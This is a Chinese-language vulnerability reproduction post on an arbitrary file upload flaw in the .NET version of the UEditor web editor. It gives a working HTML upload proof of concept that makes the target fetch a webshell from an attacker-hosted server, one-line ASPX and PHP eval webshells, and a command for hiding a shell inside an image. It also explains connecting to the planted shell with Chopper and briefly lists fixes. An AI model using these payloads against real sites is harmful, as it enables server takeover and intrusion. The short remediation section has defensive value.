UEditor .Net版本任意文件上传漏洞复现总结 – 知乎 (zhihu.com)
这个洞有一定年数了,是2018年发现的(从下图的shodan中可以得知,该漏洞已经被大部分黑客SEO利用),最近看到一个表哥研究这个洞,就顺便拿来复现分析了一波。
一、漏洞介绍
Ueditor是百度开发的一个网站编辑器,目前已经不对其进行后续开发和更新,该漏洞只存在于该编辑器的.net版本。
漏洞的成因是在获取图片资源时仅检查了ContentType,导致可以绕过达到任意文件上传。
Crawler方法对source[]的检查仅仅是一个ContentType,这个真的很佛系了。
if (response.ContentType.IndexOf("image") == -1)
{
State = "Url is not an image";
return this;
}
二、漏洞复现
1、我们可以利用post方法直接上传文件到目标网站
Poc:
<form action="http://xx.com/ueditor/net/controller.ashx?action=catchimage" enctype="multipart/form-data" method="POST"><p>shell addr: <input type="text" name="source[]" /></p><input type="submit" value="Submit" /></form>
其中【http://xx.com】填写你要测试的网站地址,action后填写路径为实际中遇到的路径,不要太死板,如果太死板不按网站的实际路径来就会出现这种路径找不到的错误。
在复现这个漏洞的时候,你可能需要一个服务器,上传你的木马文件,其中【shell addr】后填写的就是你服务器上木马的地址加上后缀(?.aspx)。
经过反复测试发现,其实只要绕过【image】检测就可以正常上传到目标服务器了,从而进一步getshell。
如果你没有绕过【image】检测的话,就会显示如下提示:
如果你成功上传的话就会返回你上传文件的路径地址。
针对检测机制的绕过方法,我上传了php木马和aspx图片马进行getshell,均可以成功getshell,不过在权限的利用方面,php木马无法进行文件的删除操作,而aspx可以进行文件的删除操作。
当木马成功上传到目标服务器之后,直接菜刀连接就可以了。
三、漏洞修复
1.修改工程目录下net/App_Code/CrawlerHandler.cs文件,添加对文件类型检查的代码。
2.使用各类WAF软件,防止攻击者上传恶意文件。
3.检查文件上传路径下是否有近期上传的畸形图片;检查是否存在asp,aspx等类型危险文件。如果发现异常文件,请判断后及时删除。
———————————————-分割线—————————————————–
PS:
1.aspx图片马绕过检测
aspx一句话:
<%@ Page Language="Jscript"%><%eval(Request.Item["zhanan"],"unsafe");%>
cmd中写图片马命令(已经存在1.jpg和2.aspx,3.aspx就是制作成功的图片马)
copy 1.jpg/b +2.aspx 3.aspx
2.php伪造类型绕过
<?php
header('Content-type: image/jpeg');
echo "<% eval request(\"zhanan\") %>";
?>
其中的a.jpg即为我的图片马,c.php为php一句话木马。(注意:不是在服务器上保存文件类型为a.jpg?.aspx或者c.php?.aspx,而是只要在【shell addr】添加后缀(a.jpg?.aspx或者c.php?.aspx)就行了。)
3.可在网址添加/controller.ashx?action=catchimage参数查看是否漏洞存在, 出现下图字样基本就是存在该漏洞的。
参考:
https://zhengbao.wang/UEditor-net%E7%89%88%E6%9C%AC%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/
UEditor .net版本 getshell